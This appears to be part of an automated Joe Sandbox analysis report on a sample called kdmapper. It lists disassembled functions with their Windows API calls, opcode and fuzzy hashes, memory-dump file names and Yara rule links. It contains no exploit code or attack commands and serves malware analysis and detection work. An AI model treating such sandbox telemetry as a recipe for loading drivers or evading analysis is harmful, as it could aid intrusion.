Opcode Fuzzy Hash: f353061ae4f149d73d3ab21e7ec43e4f795048b1284db8626e8cd6f2d76ef913
Instruction Fuzzy Hash: 09E092311402496BDB116F66DC45FEA379CAB0C381F488021BA44E2060EB61EE88DA74

Function 00DFAC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00E12641,000000FF), ref: 00DFACB0
CoUninitialize.COMBASE(?,?,?,?,00E12641,000000FF), ref: 00DFACB5

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: e723ee89861195ae52f9d5477e4fc4ccf0cf84ed3d72d0844c7e6e3b7569be3f
Instruction ID: ff45f7b02a4b9f55a29ed16d478fb0964d7f7ce8b10c0776d4c4d980e6abf4d9
Opcode Fuzzy Hash: e723ee89861195ae52f9d5477e4fc4ccf0cf84ed3d72d0844c7e6e3b7569be3f
Instruction Fuzzy Hash: DAE06572604650EFC710AF59DC06B45FBA8FB88B20F104269F416E37B0CB746841CA90

Function 00DEA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00DEA23A,?,00DE755C,?,?,?,?), ref: 00DEA254

Part of subcall function 00DEBB03: _wcslen.LIBCMT ref: 00DEBB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00DEA23A,?,00DE755C,?,?,?,?), ref: 00DEA280

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: eb14fe5ad6c65ced302208e2f8cbdf97809d47ac1dc7a814b02bb152a2d293d7
Instruction ID: 4bf7e76a3ffdf0ff20bbb0137fdcc8dd8e500b6f5e30e43522a045cff9ba1a50
Opcode Fuzzy Hash: eb14fe5ad6c65ced302208e2f8cbdf97809d47ac1dc7a814b02bb152a2d293d7
Instruction Fuzzy Hash: 0DE06D715001689ACB10AB69CC05BD97798AB083E1F048361BE44F7190D670AE448AB0

Function 00DFDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00DFDEEC

Part of subcall function 00DE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DE40A5

SetDlgItemTextW.USER32(00000065,?), ref: 00DFDF03

Part of subcall function 00DFB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DFB579
Part of subcall function 00DFB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFB58A
Part of subcall function 00DFB568: IsDialogMessageW.USER32(00010420,?), ref: 00DFB59E
Part of subcall function 00DFB568: TranslateMessage.USER32(?), ref: 00DFB5AC
Part of subcall function 00DFB568: DispatchMessageW.USER32(?), ref: 00DFB5B6

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: c0993916fa3ba3186a3650754583547d49f415a40d8ae52787db1297daf5448f
Instruction ID: feef99924e18fb11679e2efbd24cde1986117ca649fa64df2c571a6f362cb064
Opcode Fuzzy Hash: c0993916fa3ba3186a3650754583547d49f415a40d8ae52787db1297daf5448f
Instruction Fuzzy Hash: 38E092B64003882ADF12BB62DC06FAE3B6C9B15785F444852B304EA1B2DA78EA158671

Function 00DF081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00DF0836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00DEF2D8,Crypt32.dll,00000000,00DEF35C,?,?,00DEF33E,?,?,?), ref: 00DF0858

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 4547dced552db8728ba2874b27f9148809a2e27317eacf5b61de547cf01c4ad2
Instruction ID: 458af7b51e51627ae1198ad8c1fafb2b80c91b6b64df60a2aac73a6f2bccf7f5
Opcode Fuzzy Hash: 4547dced552db8728ba2874b27f9148809a2e27317eacf5b61de547cf01c4ad2
Instruction Fuzzy Hash: 32E01A768002686ADB11ABA59D09FEA7BACEF0D3D1F054065B649E2044DA74EA848AB0

Function 00DFA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00DFA3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00DFA3E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: d4d79e4e670905715b40f7060504bfccc2c4d31cfc66165f1294f902d6494f49
Instruction ID: fa895ed5c9fe5cc5376dfc5d03958ea188a9f0a168da584e7d57a428a516037f
Opcode Fuzzy Hash: d4d79e4e670905715b40f7060504bfccc2c4d31cfc66165f1294f902d6494f49
Instruction Fuzzy Hash: 3BE0EDB150021CEBCB10DF99C5416A9BBE8EF04360F11C05AA99A93251E374AE44DBA1

Function 00E02B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E02BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00E02BB5

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 1b8737929cfaf8d05c1fc9bab452244472ae9b74ef62c392817e1054935ec5cd
Instruction ID: 26a98f023f542f0c60cbc2f294f790abe8de1187717dd41505d2d73a46df0887
Opcode Fuzzy Hash: 1b8737929cfaf8d05c1fc9bab452244472ae9b74ef62c392817e1054935ec5cd
Instruction Fuzzy Hash: D7D0223425430018EC142EB43C0F59833C9AE81BB8BE0778FF720F58C1EEA280C0B821

Function 00DE12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00DE1306
ShowWindow.USER32(00000000), ref: 00DE130D

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: a434afd731d85c66a4a402eb9c81dc5a847a5d3ecdaac515288d197401f8f0c2
Instruction ID: dbce32e96efcf7def44fe86daa3350b5c861c9d8f27a254a33022b5e5f9a4d8e
Opcode Fuzzy Hash: a434afd731d85c66a4a402eb9c81dc5a847a5d3ecdaac515288d197401f8f0c2
Instruction Fuzzy Hash: BDC0123A05C240BFCB010BB5DC09C2BBBA8ABE6312F24C908B0A5D0261C238C114DB11

Function 00DE1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DE1A09

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 576b037d62f21d0455e755477d5c4546450d8b2e23cb31df77e0180181b05f90
Instruction ID: bba50b61f3bf4703b80ffe3389d7b932dccfdcb34e76bbf5c7dd167e89d505b9
Opcode Fuzzy Hash: 576b037d62f21d0455e755477d5c4546450d8b2e23cb31df77e0180181b05f90
Instruction Fuzzy Hash: E0C1A338B002949FEF15EF6AC884BAD7BA5EF16310F1841B9EC45DB296DB309944CB71

Function 00DE3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DE3BBF

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 92c63df5e9b5e09542eed32183824896f6d0f3e43c51614b0355cd2194cbac61
Instruction ID: fedeba27c581d1e2c6305fc8f0aaba5e0e6254a4a74e5dd21d69d569cec9731b
Opcode Fuzzy Hash: 92c63df5e9b5e09542eed32183824896f6d0f3e43c51614b0355cd2194cbac61
Instruction Fuzzy Hash: DF71C171500B849ECB25EB71C8559F7B7E9EF14301F44496EF2AB87241DA32AA84CF31

Function 00DE8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DE8289

Part of subcall function 00DE13DC: __EH_prolog.LIBCMT ref: 00DE13E1

Part of subcall function 00DEA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00DEA598

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: e3272506984109b68e8fd378f1cbab31754f7a72535866ef3fd5d8cb8e00dbe4
Instruction ID: 741cd96568f3422243b9f3296552ff0d36a2377d58c7b24b07051fb5b12bbdd1
Opcode Fuzzy Hash: e3272506984109b68e8fd378f1cbab31754f7a72535866ef3fd5d8cb8e00dbe4
Instruction Fuzzy Hash: 4941B8719446989ADB20FBA1CC55AE9B7B8EF00304F4444EAE18EA7093EB715FC5DB70

Function 00DE13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DE13E1

Part of subcall function 00DE5E37: __EH_prolog.LIBCMT ref: 00DE5E3C

Part of subcall function 00DECE40: __EH_prolog.LIBCMT ref: 00DECE45

Part of subcall function 00DEB505: __EH_prolog.LIBCMT ref: 00DEB50A

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 3f8c8ebfd32e4f1b80792577057d1256a2877209a8987831663a1ded6330d581
Instruction ID: 7288ba1643f4d2db47b84c5cdee66d0a1b1b3c0a6859f67c85df05ee93d49870
Opcode Fuzzy Hash: 3f8c8ebfd32e4f1b80792577057d1256a2877209a8987831663a1ded6330d581
Instruction Fuzzy Hash: 93413FB0905B809ED724DF798885AE6FBE5FF19310F504A2EE5FE83281C7316654CB20

Function 00DE13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DE13E1

Part of subcall function 00DE5E37: __EH_prolog.LIBCMT ref: 00DE5E3C

Part of subcall function 00DECE40: __EH_prolog.LIBCMT ref: 00DECE45

Part of subcall function 00DEB505: __EH_prolog.LIBCMT ref: 00DEB50A

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9579ca3712917b7aaf3ced0179b26c1ab03be40e81a833eae1297e7b0f53796b
Instruction ID: c17c1e1876679779720c53aa6569b9d356d2ed0745d769bf76c2a40795705ae6
Opcode Fuzzy Hash: 9579ca3712917b7aaf3ced0179b26c1ab03be40e81a833eae1297e7b0f53796b
Instruction Fuzzy Hash: 97413DB0905B809ED724DF798885AE6FBE5FF19310F504A2ED5FE83281C7316654CB20

Function 00DFB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DFB098

Part of subcall function 00DE13DC: __EH_prolog.LIBCMT ref: 00DE13E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d41012c598f324e1d55ca37b317f876eae42a6cdc911c5e227a199a6b8f3d60f
Instruction ID: 90e861aa1d2e47a5927c88e86dec2cd4601707f1c9f6119b5b5273a2cfb7a532
Opcode Fuzzy Hash: d41012c598f324e1d55ca37b317f876eae42a6cdc911c5e227a199a6b8f3d60f
Instruction Fuzzy Hash: 41316A759002499ACB15EF65C851AFEBBB4AF09300F14849EE409B7282D735AE04CBB1

Function 00E0AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00E13A34), ref: 00E0ACF8

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 7e1bfbf6747d668a0e700905078da3d5f38deb00518c10449969f816d4e15b49
Instruction ID: 3e73f02fafaf2311f2604f345dcbffe51f13642f8dfd6e914452d35c51b75a27
Opcode Fuzzy Hash: 7e1bfbf6747d668a0e700905078da3d5f38deb00518c10449969f816d4e15b49
Instruction Fuzzy Hash: 6711A733A007296FEB259E29DC8099AB396AB8436871F9131FD55BB2D4D630DC8187D2

Function 00DECE40 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DECE45

Part of subcall function 00DE5E37: __EH_prolog.LIBCMT ref: 00DE5E3C

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2d81e1268f5eaaa3b3fd6fad6edbd430522fd2a96e8492f403523569a65d1096
Instruction ID: 7ddc513029abdecaabd29851b6d4fd7a4f0a6efd7a409ebc2da7ada0ad6f73a2
Opcode Fuzzy Hash: 2d81e1268f5eaaa3b3fd6fad6edbd430522fd2a96e8492f403523569a65d1096
Instruction Fuzzy Hash: BD11A0B1A002849EEB14EB7AD545BAEBBE8DF84300F14445EF446D3282DB749E01CB72

Function 00DE9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DE921A

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 4f31931049b83aeb8186271291dd36f0e4c42d1c341e5c073fce8b11e371a467
Instruction ID: ceb720864ddfecfcd29edb0dfd43979fc940db7a6481b606612ba8f5cfafc716
Opcode Fuzzy Hash: 4f31931049b83aeb8186271291dd36f0e4c42d1c341e5c073fce8b11e371a467
Instruction Fuzzy Hash: 2201A5339015A8ABCF11BBA9CC919DEB736FF88750F054115F916B7112DA348D00C6B4

Function 00E03C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00E03C3F

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: d78eb6bf0902d066c15d12ac8a5386935e2063c275d3c71f57b184a29f783cd5
Instruction ID: 26764941165e5221c3b1641e6ce32d0a385fafc1a56c02c5e2e37715afd34816
Opcode Fuzzy Hash: d78eb6bf0902d066c15d12ac8a5386935e2063c275d3c71f57b184a29f783cd5
Instruction Fuzzy Hash: 24F0EC362002169FDF118E79EC4099AB7DDEF05B657145124FA05F71D0DB31DAA0C7A0

Function 00E08E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E0CA2C,00000000,?,00E06CBE,?,00000008,?,00E091E0,?,?,?), ref: 00E08E38

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
